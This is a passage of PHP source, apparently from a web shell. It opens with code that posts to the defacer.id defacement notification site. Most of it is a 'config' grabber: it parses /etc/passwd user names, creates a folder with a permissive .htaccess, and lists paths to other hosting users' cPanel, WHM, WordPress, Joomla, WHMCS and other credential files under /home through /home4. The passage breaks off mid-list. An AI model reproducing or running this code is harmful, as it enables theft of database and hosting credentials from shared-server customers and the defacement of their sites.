2479. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2480. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
2481. $result = curl_exec($curl);
2482. echo $result;
2483. curl_close($curl);
2484. echo "<br>";
2485. }
2486. }
2487. }
2488.  
2489. elseif($_GET['do'] == 'config') {
2490. if($_POST){
2491. $passwd = $_POST['passwd'];
2492. mkdir("cox_config", 0777);
2493. $isi_htc = "Options all\nRequire None\nSatisfy Any";
2494. $htc = fopen("cox_config/.htaccess","w");
2495. fwrite($htc, $isi_htc);
2496. preg_match_all('/(.*?):x:/', $passwd, $user_config);
2497. foreach($user_config[1] as $user_cox) {
2498. $user_config_dir = "/home/$user_cox/public_html/";
2499. if(is_readable($user_config_dir)) {
2500. $grab_config = array(
2501. "/home/$user_cox/.my.cnf" => "cpanel",
2502. "/home/$user_cox/.accesshash" => "WHM-accesshash",
2503. "/home/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
2504. "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
2505. "/home/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2506. "/home/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
2507. "/home/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
2508. "/home/$user_cox/public_html/forum/config.php" => "phpBB",
2509. "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal",
2510. "/home/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
2511. "/home/$user_cox/public_html/app/etc/local.xml" => "Magento",
2512. "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
2513. "/home/$user_cox/public_html/slconfig.php" => "Sitelok",
2514. "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",
2515. "/home/$user_cox/public_html/whm/configuration.php" => "WHMCS",
2516. "/home/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
2517. "/home/$user_cox/public_html/central/configuration.php" => "WHM Central",
2518. "/home/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2519. "/home/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
2520. "/home/$user_cox/public_html/submitticket.php" => "WHMCS",
2521. "/home/$user_cox/public_html/configuration.php" => "Joomla",
2522. "/home/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2523. "/home/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
2524. "/home/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
2525. "/home/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
2526. "/home/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
2527. "/home/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
2528. "/home/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
2529. "/home/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
2530. "/home/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
2531. "/home/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
2532. "/home/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
2533. "/home/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
2534. "/home/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
2535. "/home/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
2536. "/home/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
2537. "/home/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
2538. "/home/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
2539. "/home/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
2540. "/home/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
2541. "/home/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
2542. "/home/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
2543. "/home/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2544. "/home/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2545. "/home/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
2546. "/home/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
2547. "/home/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
2548. "/home/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
2549. "/home/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
2550. "/home/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
2551. "/home/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
2552. "/home/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
2553. "/home/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
2554. "/home/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
2555. "/home/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
2556. "/home/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2557. "/home/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
2558. "/home/$user_cox/public_html/wp-config.php" => "WordPress",
2559. "/home/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2560. "/home/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2561. "/home/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
2562. "/home/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
2563. "/home/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
2564. "/home/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
2565. "/home/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
2566. "/home/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
2567. "/home/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
2568. "/home/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
2569. "/home/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
2570. "/home/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
2571. "/home/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
2572. "/home/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
2573. "/home/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
2574. "/home/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
2575. "/home/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
2576. "/home/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
2577. "/home/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
2578. "/home/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
2579. "/home/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
2580. "/home/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2581. "/home/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2582. "/home/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
2583. "/home/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
2584. "/home/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
2585. "/home/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
2586. "/home/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
2587. "/home/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
2588. "/home/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
2589. "/home/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
2590. "/home/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
2591. "/home/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
2592. "/home/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
2593. "/home/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2594. "/home/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
2595. "/home1/$user_cox/.my.cnf" => "cpanel",
2596. "/home1/$user_cox/.accesshash" => "WHM-accesshash",
2597. "/home1/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
2598. "/home1/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
2599. "/home1/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2600. "/home1/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
2601. "/home1/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
2602. "/home1/$user_cox/public_html/forum/config.php" => "phpBB",
2603. "/home1/$user_cox/public_html/sites/default/settings.php" => "Drupal",
2604. "/home1/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
2605. "/home1/$user_cox/public_html/app/etc/local.xml" => "Magento",
2606. "/home1/$user_cox/public_html/admin/config.php" => "OpenCart",
2607. "/home1/$user_cox/public_html/slconfig.php" => "Sitelok",
2608. "/home1/$user_cox/public_html/application/config/database.php" => "Ellislab",
2609. "/home1/$user_cox/public_html/whm/configuration.php" => "WHMCS",
2610. "/home1/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
2611. "/home1/$user_cox/public_html/central/configuration.php" => "WHM Central",
2612. "/home1/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2613. "/home1/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
2614. "/home1/$user_cox/public_html/submitticket.php" => "WHMCS",
2615. "/home1/$user_cox/public_html/configuration.php" => "Joomla",
2616. "/home1/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2617. "/home1/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
2618. "/home1/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
2619. "/home1/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
2620. "/home1/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
2621. "/home1/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
2622. "/home1/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
2623. "/home1/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
2624. "/home1/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
2625. "/home1/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
2626. "/home1/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
2627. "/home1/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
2628. "/home1/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
2629. "/home1/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
2630. "/home1/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
2631. "/home1/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
2632. "/home1/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
2633. "/home1/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
2634. "/home1/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
2635. "/home1/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
2636. "/home1/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
2637. "/home1/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2638. "/home1/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2639. "/home1/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
2640. "/home1/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
2641. "/home1/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
2642. "/home1/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
2643. "/home1/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
2644. "/home1/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
2645. "/home1/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
2646. "/home1/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
2647. "/home1/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
2648. "/home1/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
2649. "/home1/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
2650. "/home1/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2651. "/home1/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
2652. "/home1/$user_cox/public_html/wp-config.php" => "WordPress",
2653. "/home1/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2654. "/home1/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2655. "/home1/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
2656. "/home1/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
2657. "/home1/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
2658. "/home1/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
2659. "/home1/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
2660. "/home1/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
2661. "/home1/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
2662. "/home1/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
2663. "/home1/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
2664. "/home1/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
2665. "/home1/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
2666. "/home1/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
2667. "/home1/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
2668. "/home1/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
2669. "/home1/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
2670. "/home1/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
2671. "/home1/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
2672. "/home1/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
2673. "/home1/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
2674. "/home1/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2675. "/home1/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2676. "/home1/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
2677. "/home1/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
2678. "/home1/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
2679. "/home1/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
2680. "/home1/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
2681. "/home1/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
2682. "/home1/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
2683. "/home1/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
2684. "/home1/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
2685. "/home1/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
2686. "/home1/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
2687. "/home1/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2688. "/home1/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
2689. "/home4/$user_cox/.my.cnf" => "cpanel",
2690. "/home4/$user_cox/.accesshash" => "WHM-accesshash",
2691. "/home4/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
2692. "/home4/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
2693. "/home4/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2694. "/home4/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
2695. "/home4/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
2696. "/home4/$user_cox/public_html/forum/config.php" => "phpBB",
2697. "/home4/$user_cox/public_html/sites/default/settings.php" => "Drupal",
2698. "/home4/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
2699. "/home4/$user_cox/public_html/app/etc/local.xml" => "Magento",
2700. "/home4/$user_cox/public_html/admin/config.php" => "OpenCart",
2701. "/home4/$user_cox/public_html/slconfig.php" => "Sitelok",
2702. "/home4/$user_cox/public_html/application/config/database.php" => "Ellislab",
2703. "/home4/$user_cox/public_html/whm/configuration.php" => "WHMCS",
2704. "/home4/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
2705. "/home4/$user_cox/public_html/central/configuration.php" => "WHM Central",
2706. "/home4/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2707. "/home4/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
2708. "/home4/$user_cox/public_html/submitticket.php" => "WHMCS",
2709. "/home4/$user_cox/public_html/configuration.php" => "Joomla",
2710. "/home4/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2711. "/home4/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
2712. "/home4/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
2713. "/home4/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
2714. "/home4/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
2715. "/home4/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
2716. "/home4/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
2717. "/home4/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
2718. "/home4/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
2719. "/home4/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
2720. "/home4/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
2721. "/home4/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
2722. "/home4/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
2723. "/home4/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
2724. "/home4/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
2725. "/home4/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
2726. "/home4/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
2727. "/home4/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
2728. "/home4/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
2729. "/home4/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
2730. "/home4/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
2731. "/home4/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2732. "/home4/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2733. "/home4/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
2734. "/home4/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
2735. "/home4/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
2736. "/home4/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
2737. "/home4/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
2738. "/home4/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
2739. "/home4/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
2740. "/home4/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
2741. "/home4/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
2742. "/home4/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
2743. "/home4/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
2744. "/home4/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2745. "/home4/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
2746. "/home4/$user_cox/public_html/wp-config.php" => "WordPress",
2747. "/home4/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2748. "/home4/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2749. "/home4/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
2750. "/home4/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
2751. "/home4/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
2752. "/home4/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
2753. "/home4/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
2754. "/home4/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
2755. "/home4/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
2756. "/home4/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
2757. "/home4/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
2758. "/home4/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
2759. "/home4/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
2760. "/home4/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
2761. "/home4/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
2762. "/home4/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
2763. "/home4/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
2764. "/home4/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
2765. "/home4/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
2766. "/home4/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
2767. "/home4/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
2768. "/home4/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2769. "/home4/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2770. "/home4/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
2771. "/home4/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
2772. "/home4/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
2773. "/home4/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
2774. "/home4/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
2775. "/home4/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
2776. "/home4/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
2777. "/home4/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
2778. "/home4/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
2779. "/home4/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
2780. "/home4/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
2781. "/home4/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2782. "/home4/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
2783. "/home2/$user_cox/.my.cnf" => "cpanel",
2784. "/home2/$user_cox/.accesshash" => "WHM-accesshash",
2785. "/home2/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
2786. "/home2/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
2787. "/home2/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
2788. "/home2/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
2789. "/home2/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
2790. "/home2/$user_cox/public_html/forum/config.php" => "phpBB",
2791. "/home2/$user_cox/public_html/sites/default/settings.php" => "Drupal",
2792. "/home2/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
2793. "/home2/$user_cox/public_html/app/etc/local.xml" => "Magento",
2794. "/home2/$user_cox/public_html/admin/config.php" => "OpenCart",
2795. "/home2/$user_cox/public_html/slconfig.php" => "Sitelok",
2796. "/home2/$user_cox/public_html/application/config/database.php" => "Ellislab",
2797. "/home2/$user_cox/public_html/whm/configuration.php" => "WHMCS",
2798. "/home2/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
2799. "/home2/$user_cox/public_html/central/configuration.php" => "WHM Central",
2800. "/home2/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
2801. "/home2/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
2802. "/home2/$user_cox/public_html/submitticket.php" => "WHMCS",
2803. "/home2/$user_cox/public_html/configuration.php" => "Joomla",
2804. "/home2/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
2805. "/home2/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
2806. "/home2/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
2807. "/home2/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
2808. "/home2/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
2809. "/home2/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
2810. "/home2/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
2811. "/home2/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
2812. "/home2/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
2813. "/home2/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
2814. "/home2/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
2815. "/home2/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
2816. "/home2/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
2817. "/home2/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
2818. "/home2/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
2819. "/home2/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
2820. "/home2/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
2821. "/home2/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
2822. "/home2/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
2823. "/home2/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
2824. "/home2/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
2825. "/home2/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
2826. "/home2/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
2827. "/home2/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
2828. "/home2/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
2829. "/home2/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
2830. "/home2/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
2831. "/home2/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
2832. "/home2/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
2833. "/home2/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
2834. "/home2/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
2835. "/home2/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
2836. "/home2/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
2837. "/home2/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
2838. "/home2/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
2839. "/home2/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
2840. "/home2/$user_cox/public_html/wp-config.php" => "WordPress",
2841. "/home2/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
2842. "/home2/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
2843. "/home2/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
2844. "/home2/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
2845. "/home2/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
2846. "/home2/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
2847. "/home2/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
2848. "/home2/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
2849. "/home2/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
2850. "/home2/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
2851. "/home2/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
2852. "/home2/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
2853. "/home2/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
2854. "/home2/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
2855. "/home2/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
2856. "/home2/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
2857. "/home2/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
2858. "/home2/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
2859. "/home2/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
2860. "/home2/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
2861. "/home2/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
2862. "/home2/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
2863. "/home2/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
2864. "/home2/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
2865. "/home2/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
2866. "/home2/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
2867. "/home2/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
2868. "/home2/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
2869. "/home2/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
2870. "/home2/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
2871. "/home2/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
2872. "/home2/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
2873. "/home2/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
2874. "/home2/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
2875. "/home2/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
2876. "/home2/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
2877. "/home3/$user_cox/.my.cnf" => "cpanel",
2878. "/home3/$user_cox/.accesshash" => "WHM-accesshash",
2879. "/home3/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
2880. "/home3/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
2881. "/home3/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
